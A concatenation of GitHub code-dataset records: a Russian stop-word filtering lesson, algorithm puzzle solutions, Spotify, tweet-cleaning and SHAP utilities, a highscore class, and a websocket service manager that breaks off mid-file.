можно устранить без потери содержания\n# водность текста - процентное содержание незначащих \"стоп-слов\"\n# https://contentmonster.ru/ur-6-vodnost-teksta\n# Водность текста 100%\n# Вот это да! Как быстро все вокруг стало невероятно великолепным теперь для меня! У меня никогда больше, наверное, не будет такого, как сегодня, когда мое «Я» стало менее важным, чем что-то другое. Ещё недавно мне никто не был нужен, я хотел быть один. А теперь я могу, наконец, думать о тебе и знать, что ты для меня – самое главное. Теперь у меня есть ты, и я понимаю: лучшее, что можно сделать �� это быть с тобой рядом!\n\n# Водность текста – 0%\n# Иваненко Павел Анатольевич. Место рождения – Иркутск. Образование – Национальный Исследовательский Иркутский государственный технический университет. Специальность - Конструкторско-технологическое обеспечение машиностроительных производств. Иностранные языки – французский, немецкий, английский. Любвеобилен. Характер – мягкий, податливый. Холост. Предпочитает интернет-общение. Носит одежду пастельных тонов. Злоупотребляет алкоголем. Коммуникабельный, ответственный, вежливый, доброжелательный, занудный.\n\n# Попробуйте самостоятельно оценить водность следующего текста:\n# Истинный ариец. Характер - нордический, выдержанный. С товарищами по работе поддерживает хорошие отношения. Безукоризненно выполняет свой служебный долг. Беспощаден к врагам Рейха. Отличный спортсмен: чемпион Берлина по теннису. Холост; в связях, порочащих его, замечен не был. Отмечен наградами фюрера и благодарностями рейхсфюрера СС.\n\n# задача: разбить предложенный текст на слова, написав минимум кода. посторонние символы удалить. стоп-слова удалить. регулярные выражения использовать нельзя\n# для простоты считаем, что у нас нет словаря стоп-слов, поэтому стоп-словами будем считать все слова короче 6 символов\n\ntext = \"Вы должны войти в эту сеть перед тем как сможете получить доступ в Интернет. Этот сайт использует Форсированное защищённое соединение HTTP (HSTS), чтобы указать, что Firefox должен подключаться к нему только через защищённое соединение. В результате, добавление исключения для этого сертификата невозможно.\"\n\n# избавляемся от прописных букв\ntext = text.lower()\n# оставляем только слова на русском и английском языке. все лишние символы удаляем\ntext_that_matter = \"\".join(list(filter(lambda x: x>=\"а\" and x<=\"я\" or x>=\"a\" and x<=\"z\" or x == \"ё\" or x == \" \", text)))\n# разбиваем текст на слова\nwords = text_that_matter.split(\" \")\n# удаляем все слова короче 6 букв\nwords = list(filter(lambda x: len(x) > 5, words))\nprint(words)\n","repo_name":"Shorstko/mai_python_2019","sub_path":"04 Lambdas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11826,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42014104504","text":"# https://www.acwing.com/problem/content/1211/\n\nn = int(input())\nlength = len(str(n))\nstate = [0] * 10\ncnt = 0\n\n\ndef dfs_c(a, c):\n b = c * (n - a)\n if len(str(a)) + len(str(b)) + len(str(c)) > 9:\n return\n if set(str(a) + str(b) + str(c)) == set(\"123456789\"):\n global cnt\n cnt += 1\n for i in range(1, 10):\n if state[i] == 0:\n state[i] = 1\n dfs_c(a, c * 10 + i)\n state[i] = 0\n\n\ndef dfs_a(a):\n if a >= n:\n return\n if a != 0:\n dfs_c(a, 0)\n for i in range(1, 10):\n if state[i] == 0:\n state[i] = 1\n dfs_a(a * 10 + i)\n state[i] = 0\n\n\ndfs_a(0)\nprint(cnt)\n\n\n\n\n","repo_name":"SumilerJR/algorithms","sub_path":"2022年11月/04 AcWing 1209. 带分数/带分数.py","file_name":"带分数.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10546581507","text":"def solution(progresses, speeds):\r\n finish = []\r\n for i in range(len(speeds)):\r\n remnant = 100 - progresses[i]\r\n if remnant%speeds[i] == 0:\r\n finish.append(remnant//speeds[i])\r\n else:\r\n finish.append(remnant//speeds[i]+1)\r\n \r\n cnt, ret = 0, []\r\n x = finish[0]\r\n for i in range(1, len(finish)):\r\n cnt += 1\r\n if x < finish[i]:\r\n ret.append(cnt)\r\n cnt, x = 0, finish[i]\r\n ret.append(cnt+1)\r\n return ret","repo_name":"yws1502/Algorithm","sub_path":"2차_Play_Data/11_기능개발.py","file_name":"11_기능개발.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31043410418","text":"from authspot import authorise_connection, setup_config\nimport spotipy\n\nimport spotipy\nimport sys\nfrom spotipy.oauth2 import SpotifyClientCredentials\n\n\ndef return_artist_info(artist_name, spotify):\n results = spotify.search(q=\"artist:\" + artist_name, type=\"artist\")\n items = results[\"artists\"][\"items\"]\n if len(items) > 0:\n artist = items[0]\n artist_info = {\n \"Artist\": items[0][\"name\"],\n \"image\": artist[\"images\"][0][\"url\"],\n \"genres\": items[0][\"genres\"],\n \"id\": items[0][\"id\"],\n \"href\": items[0][\"href\"],\n \"images\": items[0][\"images\"],\n \"popularity\": items[0][\"popularity\"],\n \"type\": items[0][\"type\"],\n \"uri\": items[0][\"uri\"],\n }\n return artist_info\n\n\nif __name__ == \"__main__\":\n config, client_id, client_secret = setup_config()\n spotify = authorise_connection(client_id, client_secret)\n artist_info = return_artist_info(\"R.A.P Ferreira\", spotify)\n print(artist_info)\n","repo_name":"conork92/musicboxd","sub_path":"musicboxd/get_artist.py","file_name":"get_artist.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"18416622955","text":"# inspired from: https://github.com/explosion/spaCy/blob/master/spacy/about.py\n\n__title__ = \"access_niu\"\n__version__ = \"0.0.2dev\"\n__summary__ = \"Production grade Natural Image Understanding\"\n__uri__ = \"http://accessai.co\"\n__author__ = \"ConvexHull Technology\"\n__email__ = \"contact@accessai.co\"\n__license__ = \"Apache 2.0\"\n__release__ = False\n","repo_name":"accessai/access-niu","sub_path":"access_niu/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"} +{"seq_id":"11219433801","text":"from sys import stdin,stdout\n\nwhile True:\n\tn = input()\n\tif n == -1: break\n\tarr = map(int,stdin.readline().split())\n\tvistos = set(arr)\n\tarr.sort()\n\tsoma,res = sum(arr),0\n\tl,r = (n-2)/2, (n-1)/2\n\n\tif arr[r] - arr[l] - 1:\n\t\tsol = soma/(n-1)\n\t\tif sol == int(sol) and sol not in vistos and arr[l] < sol < arr[r] and (sol+soma)/n == sol: res += 1\n\n\tif l < len(arr):\n\t\tsol = arr[l]*n - soma\n\t\tif -10**15 < sol < arr[l] and sol == int(sol) and sol not in vistos and (sol+soma)/n == arr[l]: res += 1\n\n\tif r < len(arr) :\n\t\tsol = arr[r]*n - soma\n\t\tif arr[r] < sol < 10**15 and sol == int(sol) and sol not in vistos and (sol+soma)/n == arr[r]: res += 1\n\n\tstdout.write(str(res)+'\\n')","repo_name":"EduardoMCF/Competitive-Programming","sub_path":"OnlineJudges/URI/Equilíbrio-1990.py","file_name":"Equilíbrio-1990.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71224946958","text":"import argparse\nfrom datetime import datetime\nimport logging\nimport re\nimport string\nfrom multiprocessing import Pool\nfrom typing import List, Tuple\n\nimport nltk\nimport pandas as pd\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\nfrom nltk.tokenize import TweetTokenizer\nfrom tqdm import tqdm\n\nlogging.basicConfig(\n format=\"%(asctime)s | %(levelname)s: %(message)s\", level=logging.INFO\n)\n\n# Instantiate the stemmer, lemmatizer and tokenizer objects\nstemmer = PorterStemmer()\nlemmatizer = WordNetLemmatizer()\ntokenizer = TweetTokenizer()\n\n# Get stopwords\nstopwords = list(nltk.corpus.stopwords.words(\"english\"))\n\n\ndef parse_arguments():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", help=\"Path to pickle with Tweets\")\n parser.add_argument(\"-n\", \"--njobs\", type=int, default=4)\n return parser.parse_args()\n\n\ndef _clean_tweet(tweet: str) -> Tuple[List[str], List[str]]:\n # Lowercasing words\n tweet = tweet.lower()\n\n tweet = re.sub(r\"…\", \"\", tweet)\n\n # Removing '&' which was found to be common\n tweet = re.sub(r\"&\", \"\", tweet)\n\n # Replace other instances of \"&\" with \"and\"\n tweet = re.sub(r\"&\", \"and\", tweet)\n\n # Removing mentions\n tweet = re.sub(r\"@\\w+ \", \"\", tweet)\n\n # Removing 'RT' and 'via'\n tweet = re.sub(r\"(^rt|^via)((?:\\b\\W*@\\w+)+): \", \"\", tweet)\n\n # Removing emojis\n EMOJI_PATTERN = re.compile(\n \"[\"\n \"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n \"\\U0001F600-\\U0001F64F\" # emoticons\n \"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n \"\\U0001F700-\\U0001F77F\" # alchemical symbols\n \"\\U0001F780-\\U0001F7FF\" # Geometric Shapes Extended\n \"\\U0001F800-\\U0001F8FF\" # Supplemental Arrows-C\n \"\\U0001F900-\\U0001F9FF\" # Supplemental Symbols and Pictographs\n \"\\U0001FA00-\\U0001FA6F\" # Chess Symbols\n \"\\U0001FA70-\\U0001FAFF\" # Symbols and Pictographs Extended-A\n \"\\U00002702-\\U000027B0\" # Dingbats\n \"\\U000024C2-\\U0001F251\"\n \"]+\"\n )\n\n tweet = re.sub(EMOJI_PATTERN, \"\", tweet)\n\n # Removing punctuation\n my_punctuation = string.punctuation.replace(\"#\", \"\")\n my_punctuation = my_punctuation.replace(\"-\", \"\")\n\n tweet = tweet.translate(str.maketrans(\"\", \"\", my_punctuation))\n tweet = re.sub(\n r\" - \", \"\", tweet\n ) # removing dash lines bounded by whitespace (and therefore not part of a word)\n tweet = re.sub(\n r\"[’“”—,!]\", \"\", tweet\n ) # removing punctuation that is not captured by string.punctuation\n\n # Removing odd special characters\n tweet = re.sub(r\"[┻┃━┳┓┏┛┗]\", \"\", tweet)\n tweet = re.sub(r\"\\u202F|\\u2069|\\u200d|\\u2066\", \"\", tweet)\n\n # Removing URLs\n tweet = re.sub(r\"http\\S+\", \"\", tweet)\n\n # Removing numbers\n tweet = re.sub(r\"[0-9]\", \"\", tweet)\n\n # Removing separators and superfluous whitespace\n tweet = tweet.strip()\n tweet = re.sub(r\" +\", \" \", tweet)\n\n # Tokenizing\n tokens = tokenizer.tokenize(tweet)\n\n # Removing stopwords\n tokens = [w for w in tokens if w not in stopwords]\n\n # Lemmatize or stem the tok\n stems = [stemmer.stem(w) for w in tokens]\n lemmas = [lemmatizer.lemmatize(w) for w in tokens]\n\n return stems, lemmas\n\n\ndef process_text(tweets: list, n_jobs: int = 4):\n \"\"\"\n Maps the text processing to n workers.\n \"\"\"\n with Pool(n_jobs) as p:\n # stems, lemmas =\n return tqdm(\n zip(*p.imap(_clean_tweet, tweets)),\n total=len(tweets),\n )\n\n\ndef _get_bigrams(unigram: list) -> list:\n \"\"\"\n Takes list of unigrams and converts them to bigrams\n \"\"\"\n return [\n \"_\".join([unigram[i], unigram[i + 1]])\n for i, _ in enumerate(unigram)\n if i != len(unigram) - 1\n ]\n\n\ndef main():\n\n args = parse_arguments()\n logging.info(f\"Reading dataset: {args.input}\")\n df = pd.read_parquet(args.input, engine = \"fastparquet\")\n\n logging.info(f\"Processing {df.shape[0]} tweets across {args.njobs} workers\")\n df[\"stems\"], df[\"lemmas\"] = process_text(df[\"text\"].tolist(), args.njobs)\n logging.info(\"Text processed. Getting bigrams\")\n\n df[\"stems_bigrams\"] = df[\"stems\"].apply(_get_bigrams) + df[\"stems\"]\n df[\"lemmas_bigrams\"] = df[\"lemmas\"].apply(_get_bigrams) + df[\"lemmas\"]\n\n parquet_path = \"2022-11-13_processed.parquet\"\n logging.info(f\"Saving to {parquet_path}\")\n df.to_parquet(parquet_path, engine = \"pyarrow\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CDHUppsala/alt-right-formations","sub_path":"analysis/process_txt.py","file_name":"process_txt.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40085885766","text":"class Solution:\n def maxConsecutive(self, bottom: int, top: int, special: List[int]) -> int:\n lb = bottom\n ans = 0\n special.sort()\n \n \n for i in range(len(special)):\n cns = special[i] - lb\n ans = max(cns,ans)\n lb = special[i] + 1\n \n ans = max(ans,top - lb + 1)\n \n return ans\n \n \n ","repo_name":"rajat844/Leetcode2022","sub_path":"2274-maximum-consecutive-floors-without-special-floors/2274-maximum-consecutive-floors-without-special-floors.py","file_name":"2274-maximum-consecutive-floors-without-special-floors.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7245539846","text":"# -*- coding: utf-8 -*-\n\nimport warnings\nwarnings.simplefilter(\"ignore\", UserWarning)\n\nimport numpy as np\nimport h5py\nimport os\nimport json\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport missingno as mno\nimport seaborn as sns\nfrom sklearn import linear_model\nimport math\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn import metrics\nfrom sklearn import svm\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom bayes_opt import BayesianOptimization\nfrom joblib import Parallel, delayed\nfrom sklearn import svm, datasets\nfrom matplotlib.pyplot import figure\nfrom scipy.stats import ttest_ind\nimport copy\nimport random\nimport shap\nimport re\n\n\ndef calc_shap(shap_values, X, expected_value):\n \n explanation = copy.copy(shap.Explanation(shap_values,\n base_values=np.array(np.full((len(X), ), np.array(expected_value))),\n data=X.values,\n feature_names=list(X.columns)))\n \n return explanation\n\ndef get_importance(class_idx, beta, feature_names, intercepts=None):\n \"\"\"\n Retrive and sort abs magnitude of coefficients from model.\n \"\"\"\n\n # sort the absolute value of model coef from largest to smallest\n srt_beta_k = np.argsort(np.abs(beta[class_idx, :]))[::-1]\n feat_names = [feature_names[idx] for idx in srt_beta_k]\n feat_imp = beta[class_idx, srt_beta_k]\n # include bias among feat importances\n if intercepts is not None:\n intercept = intercepts[class_idx]\n bias_idx = len(feat_imp) - np.searchsorted(np.abs(feat_imp)[::-1], np.abs(intercept) )\n feat_imp = np.insert(feat_imp, bias_idx, intercept.item(), )\n intercept_idx = np.where(feat_imp == intercept)[0][0]\n feat_names.insert(intercept_idx, 'bias')\n\n return feat_imp, feat_names\n\n\n\ndef reorder_feats(vals_and_names, src_vals_and_names):\n \"\"\"Given a two tuples, each containing a list of ranked feature\n shap values and the corresponding feature names, the function\n reorders the values in vals according to the order specified in\n the list of names contained in src_vals_and_names.\n \"\"\"\n\n _, src_names = src_vals_and_names\n vals, names = vals_and_names\n reordered = np.zeros_like(vals)\n\n for i, name in enumerate(src_names):\n alt_idx = names.index(name)\n reordered[i] = vals[alt_idx]\n\n return reordered, src_names\n\ndef compare_avg_mag_shap(class_idx, comparisons, baseline, **kwargs):\n \"\"\"\n Given a list of tuples, baseline, containing the feature values and a list with feature names\n for each class and, comparisons, a list of lists with tuples with the same structure , the\n function reorders the values of the features in comparisons entries according to the order\n of the feature names provided in the baseline entries and displays the feature values for comparison.\n \"\"\"\n\n methods = kwargs.get(\"methods\", [f\"method_{i}\" for i in range(len(comparisons) + 1)])\n\n n_features = len(baseline[class_idx][0])\n\n # bar settings\n bar_width = kwargs.get(\"bar_width\", 0.05)\n bar_space = kwargs.get(\"bar_space\", 2)\n\n # x axis\n x_low = kwargs.get(\"x_low\", 0.0)\n x_high = kwargs.get(\"x_high\", 1.0)\n x_step = kwargs.get(\"x_step\", 0.05)\n x_ticks = np.round(np.arange(x_low, x_high + x_step, x_step), 3)\n\n # y axis (these are the y coordinate of start and end of each group\n # of bars)\n start_y_pos = np.array(np.arange(0, n_features))*bar_space\n end_y_pos = start_y_pos + bar_width*len(methods)\n y_ticks = 0.5*(start_y_pos + end_y_pos)\n\n # figure\n fig_x = kwargs.get(\"fig_x\", 10)\n fig_y = kwargs.get(\"fig_y\", 7)\n\n # fontsizes\n title_font = kwargs.get(\"title_fontsize\", 20)\n legend_font = kwargs.get(\"legend_fontsize\", 20)\n tick_labels_font = kwargs.get(\"tick_labels_fontsize\", 20)\n axes_label_fontsize = kwargs.get(\"axes_label_fontsize\", 10)\n\n # labels\n title = kwargs.get(\"title\", None)\n ylabel = kwargs.get(\"ylabel\", None)\n xlabel = kwargs.get(\"xlabel\", None)\n\n # process input data\n methods = list(reversed(methods))\n base_vals = baseline[class_idx][0]\n ordering = baseline[class_idx][1]\n comp_vals = []\n\n # reorder the features so that they match the order of the baseline (ordering)\n for comparison in comparisons:\n vals, ord_ = reorder_feats(comparison[class_idx], baseline[class_idx])\n comp_vals.append(vals)\n assert ord_ is ordering\n\n all_vals = [base_vals] + comp_vals\n data = dict(zip(methods, all_vals))\n df = pd.DataFrame(data=data, index=ordering)\n\n # plotting logic\n fig, ax = plt.subplots(figsize=(fig_x, fig_y))\n\n for i, col in enumerate(df.columns):\n values = list(df[col])\n y_pos = [y + bar_width*i for y in start_y_pos]\n ax.barh(y_pos, list(values), bar_width, label=col)\n\n # add ticks, legend and labels\n ax.set_xticks(x_ticks)\n ax.set_xticklabels([str(x) for x in x_ticks], rotation=45, fontsize=tick_labels_font)\n ax.set_xlabel(xlabel, fontsize=axes_label_fontsize)\n ax.set_yticks(y_ticks)\n ax.set_yticklabels(ordering, fontsize=tick_labels_font)\n ax.set_ylabel(ylabel, fontsize=axes_label_fontsize)\n ax.invert_yaxis() # labels read top-to-bottom\n ax.legend(fontsize=legend_font)\n\n plt.grid(True)\n plt.title(title, fontsize=title_font)\n\n return ax, fig, df\n\ndef _flatten(X):\n img_size = X[0].shape\n X = X.reshape([X.shape[0], np.prod(img_size)])\n return(X)\n\n\ndef split_set(X, y, fraction, random_state=0):\n \"\"\"\n Given a set X, associated labels y, splits a fraction y from X.\n \"\"\"\n _, X_split, _, y_split = train_test_split(X,\n y,\n test_size=fraction,\n random_state=random_state,\n )\n print(\"Number of records: {}\".format(X_split.shape[0]))\n print(\"Number of class {}: {}\".format(0, len(y_split) - y_split.sum()))\n print(\"Number of class {}: {}\".format(1, y_split.sum()))\n\n return X_split, y_split\n\ndef plot_importance(feat_imp, feat_names, class_idx, **kwargs):\n \"\"\"\n Create a horizontal barchart of feature effects, sorted by their magnitude.\n \"\"\"\n\n left_x, right_x = kwargs.get(\"left_x\"), kwargs.get(\"right_x\")\n eps_factor = kwargs.get(\"eps_factor\", 4.5)\n\n fig, ax = plt.subplots(figsize=(20, 10))\n y_pos = np.arange(len(feat_imp))\n ax.barh(y_pos, feat_imp)\n ax.set_yticks(y_pos)\n ax.set_yticklabels(feat_names, fontsize=9)\n ax.invert_yaxis() # labels read top-to-bottom\n ax.set_xlabel(f'Feature effects for class {class_idx}', fontsize=9)\n ax.set_xlim(left=left_x, right=right_x)\n\n for i, v in enumerate(feat_imp):\n eps = 0.03\n if v < 0:\n eps = -eps_factor*eps\n ax.text(v + eps, i + .25, str(round(v, 3)))\n\n return ax, fig\n\ndef permute_columns(X, feat_names, perm_feat_names):\n \"\"\"\n Permutes the original dataset so that its columns\n (ordered according to feat_names) have the order\n of the variables after transformation with the\n sklearn preprocessing pipeline (perm_feat_names).\n \"\"\"\n\n perm_X = np.zeros_like(X)\n perm = []\n for i, feat_name in enumerate(perm_feat_names):\n feat_idx = feat_names.index(feat_name)\n perm_X[:, i] = X[:, feat_idx]\n perm.append(feat_idx)\n return perm_X, perm\n\ndef create_category_map(X_data , limit = 10):\n \"\"\"creates category map from a DataFrame and lists of columnnumbers\n \n \n input : DataFrame\n return: Dictionary : categorymap \n List : column number of category columns\n List : column number of numerical columns\n \"\"\"\n \n category_map = {}\n\n for i,col_name in enumerate(X_data.columns):\n unique_len = len(X_data[col_name].dropna().unique())\n\n if unique_len == 2 or unique_len < limit:\n print(col_name,\" : \", unique_len)\n\n category_map[i] = {}\n category_map[i] = []\n\n if np.isnan(list(X_data[col_name].unique())).any():\n category_map[i].append(np.nan)\n\n cat_values = list(X_data[col_name].dropna().unique())\n cat_values.sort()\n\n for cat_value in cat_values:\n category_map[i].append(cat_value)\n \n ordinal_features = [x for x in range(len(X_data.columns)) if x not in list(category_map.keys())]\n categorical_features = list(category_map.keys())\n \n return category_map,categorical_features,ordinal_features,list(X_data.columns)\n\n\ndef get_featnames(preprocessor, \n categorical_features,\n ordinal_features,\n feature_names):\n fts = [feature_names[x] for x in categorical_features]\n ohe = preprocessor.transformers_[1][1].named_steps['onehot']\n cat_enc_feat_names = ohe.get_feature_names(fts)\n feat_enc_dim = [len(cat_enc) - 1 for cat_enc in ohe.categories_]\n start=len(ordinal_features)\n cat_feat_start = [start]\n for dim in feat_enc_dim[:-1]:\n cat_feat_start.append(dim + cat_feat_start[-1])\n numerical_feats_idx = preprocessor.transformers_[0][2]\n categorical_feats_idx = preprocessor.transformers_[1][2]\n scaler = preprocessor.transformers_[0][1].named_steps['scaler']\n num_feats_names = [feature_names[i] for i in numerical_feats_idx]\n cat_feats_names = [feature_names[i] for i in categorical_feats_idx]\n perm_feat_names = num_feats_names + cat_feats_names\n \n return num_feats_names,cat_feats_names,perm_feat_names,cat_feat_start,feat_enc_dim,fts","repo_name":"mendeltem/medical_data_analyse","sub_path":"library/ml_lib.py","file_name":"ml_lib.py","file_ext":"py","file_size_in_byte":10096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16122916448","text":"import os.path\n\ndef sortSecond(val): \n return val[1]\n\nclass Highscore:\n\n def __init__(self):\n self.file_name = 'data/highscore'\n if not os.path.exists(self.file_name):\n self.reset()\n\n\n def __str__(self):\n lines = []\n lines.append('\\nHIGHSCORE')\n file = open(self.file_name, 'r')\n scores = []\n with open(self.file_name) as fp:\n for cnt, line in enumerate(fp):\n hs = line.replace(\" \", \"\").strip().split('\\t')\n scores.append([hs[0], int(hs[1])])\n \n file.close()\n scores.sort(key=sortSecond, reverse=True)\n rank = 1\n for name, score in scores:\n lines.append('Rank #{0} \\t Name: {1} \\t Points: {2}'.format(rank, name, score))\n rank += 1\n\n\n return '\\n'.join(lines)\n\n\n def write(self, score):\n input('Press Enter to add to highscore')\n name = input('Enter your name:')\n file = open(self.file_name, 'a+')\n file.write('{0} \\t {1} \\n'.format(name, score))\n file.close()\n\n\n def reset(self):\n file = open(self.file_name, 'w+')\n file.write('')\n file.close()\n\n","repo_name":"simonfranzen/deepq-tetris","sub_path":"highscore.py","file_name":"highscore.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"22265515307","text":"import time\r\nstart=time.time()\r\ndata=map(int,input())\r\nbound=1000000\r\narr=[0]*(bound)\r\narr[1]=1\r\nfor i in range(2,bound):\r\n n=i\r\n cycle=1\r\n while n!=1:\r\n if n%2!=0:\r\n n=3*n+1\r\n cycle+=1\r\n n//=2\r\n cycle+=1\r\n if nb:\r\n a,b=b,a\r\n m=max(arr[a:b+1])\r\n print(p,q,m)\r\n \r\nend=time.time()\r\nrun=end-start\r\nprint(run)\r\n ","repo_name":"forestbird3/forest_bird","sub_path":"contents.py","file_name":"contents.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34504821552","text":"import multiprocessing\nimport asyncio\nimport websockets\nfrom websockets.exceptions import ConnectionClosed, ConnectionClosedError\nimport traceback, logging\nimport json\nfrom json.decoder import JSONDecodeError\nfrom path import Path\nfrom uuid import uuid4 as uuidv4\nfrom collections import defaultdict\nfrom servman.typings import IConnectionConfig, IParcel\nfrom servman.service_pool import ServicePool, Pipeline\nfrom path import Path\nfrom typing import Callable\n\n\nclass ServiceManager:\n \"\"\"\n A task scheduler and communication proxy between clients\n and scheduled tasks called services. Server-like.\n\n The ServiceManager object is the core of the servman project.\n Basic usage is to create a ServiceManger and then tell it which tasks\n you would like to run. Meanwhile, it will automatically create a websocket\n server based on the configuration file you provide for it. You usually\n will want to design your Client and corresponding Service to connect\n to the ServiceManager.\n\n A simple heartbeat.py project is available in the examples folder.\n For a more complex integration, checkout the MafiaBot project which\n uses discord.py (https://github.com/dggfi/MafiaBot)\n \"\"\"\n def __init__(self, config_path, log_filename='logs/servman.log'):\n self._agent_id = str(uuidv4())\n\n # Config\n config_path = Path(config_path)\n\n if not config_path.exists():\n print(f\"Error: File {config_path} does not exist.\")\n exit()\n\n config = ''\n\n try:\n config = json.loads(config_path.read_text())\n except JSONDecodeError:\n print(f\"The JSON in {config_path} is not formatted correctly.\")\n exit()\n\n self.config: IConnectionConfig = config\n\n # Actions\n actions = {\n 'create_service': self.create_service,\n 'join_service_pool': self.join_service_pool,\n 'hook_into_pool': self.hook_into_pool,\n 'kill': self.kill,\n }\n\n def return_bad_action(): return self.bad_action\n self._actions = defaultdict(return_bad_action, actions)\n\n # Routes\n routes = {\n 'servman': self.open_here,\n 'client': self.route_to_other,\n 'service': self.route_to_other\n }\n\n def return_bad_route(): return self.bad_route\n self.routes = defaultdict(return_bad_route, routes)\n\n self.allowed_agents = set([\n 'client',\n 'service'\n ])\n\n # Websockets API\n self.host = config['host']\n self.port = config['port']\n self.connection_config = {\n 'host': self.host,\n 'port': self.port\n }\n\n # Collections\n self.id_to_websocket = {} # connection_id: websocket\n self.identifier_to_service_pools = {} # identifier: ServicePool\n self.tasks = {} # str: Callable\n self.client_pool_identifiers = {} # agent_id: set([identifiers])\n self.pending_pipelines = {}\n\n # Misc.\n self.t_ping = None\n self.n_messages = 0\n\n # Logger\n self.logger = logging.getLogger(\"websockets.server\")\n self.logger.setLevel(logging.INFO)\n # log_destination = Path(log_filename)\n handler = logging.FileHandler(filename=log_filename, encoding='utf-8', mode='w')\n handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\n self.logger.addHandler(handler)\n \n # Security\n self.killed = False\n self.secret = 'my_secret'\n\n\n ### Websocket\n async def register_websocket(self, websocket):\n agent = ''\n connection_id = ''\n proxy = 'false'\n try:\n agent = websocket.request_headers['agent']\n connection_id = websocket.request_headers['connection_id']\n proxy = websocket.request_headers['proxy']\n except KeyError:\n response: IParcel = { \n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_servman_error',\n 'data': { 'exception': 'HeaderMissing', 'message': \"Websocket missing critical field in request header.\" }\n }\n await websocket.send(json.dumps(response))\n await websocket.close()\n return\n \n if agent not in self.allowed_agents:\n response: IParcel = { \n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_servman_error',\n 'data': { 'exception': 'HeaderMissing', 'message': \"Websocket missing critical field in request header.\" }\n }\n await websocket.send(json.dumps(response))\n await websocket.close()\n return\n \n # Test whether the websocket is an original agent-to-servman connection\n # or if it should be a proxy connection \n existing_socket = self.id_to_websocket.get(connection_id, None)\n if existing_socket:\n response: IParcel = {\n 'routing': agent,\n 'action': 'handle_servman_error',\n 'data': { 'parcel': None, 'exception': 'ConnectionExists', 'message': f\"Websocket with agent_id/connection_id {connection_id} already exists!\" }\n }\n await existing_socket.send(json.dumps(response))\n await websocket.close()\n return\n\n self.id_to_websocket[connection_id] = websocket\n if proxy == 'true':\n await self.build_pipeline(websocket)\n\n\n async def unregister_websocket(self, websocket):\n \"\"\"\n There may be concurrency issues when a client with multiple\n connections drops.\n \"\"\"\n\n connection_id = websocket.request_headers['connection_id']\n\n # Remove references\n self.id_to_websocket.pop(connection_id)\n agent_id = websocket.request_headers['agent_id']\n if agent_id in self.client_pool_identifiers:\n identifiers = self.client_pool_identifiers[agent_id]\n identifiers = set([i for i in identifiers if i in self.identifier_to_service_pools])\n orphaned_identifiers = set([i for i in identifiers if websocket is self.identifier_to_service_pools[i].owner_websocket and self.identifier_to_service_pools[i].close_on_disconnect])\n identifiers = identifiers - orphaned_identifiers\n if identifiers:\n self.client_pool_identifiers[agent_id] = identifiers\n else:\n if agent_id in self.client_pool_identifiers: self.client_pool_identifiers.pop(agent_id)\n for identifier in orphaned_identifiers:\n pool = self.identifier_to_service_pools.pop(identifier)\n # Defer socket closure to service pool\n await pool.close(agent_id)\n \n\n ### Actions -- Error\n async def bad_action(self, parcel: IParcel, websocket):\n self.logger.error(f\"Error: Got a bad action! '{parcel['action']}'' in parcel {parcel}\")\n \n\n async def bad_route(self, parcel: IParcel, websocket):\n self.logger.error(f\"Error: Got a bad route! '{parcel['route']}' in parcel {parcel}\")\n \n\n # Actions -- Parcels\n async def open_here(self, parcel: IParcel, websocket):\n await self._actions[parcel['action']](parcel, websocket)\n\n\n async def route_to_other(self, parcel: IParcel, websocket):\n destination_websocket = self.id_to_websocket[parcel['destination_id']]\n await destination_websocket.send(json.dumps(parcel))\n\n\n ### Actions -- Services\n async def create_service(self, parcel: IParcel, websocket):\n identifier = parcel['data']['kwargs']['identifier']\n\n # Check for existing service pool\n existing_service_pool: ServicePool = self.identifier_to_service_pools.get(identifier, None)\n if existing_service_pool and websocket is existing_service_pool.owner_websocket:\n response: IParcel = {\n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_servman_error',\n 'data': { 'exception': 'ServiceCollision', 'message': f'Service with identifier {identifier} already exists' }\n }\n await websocket.send(json.dumps(response))\n return\n elif 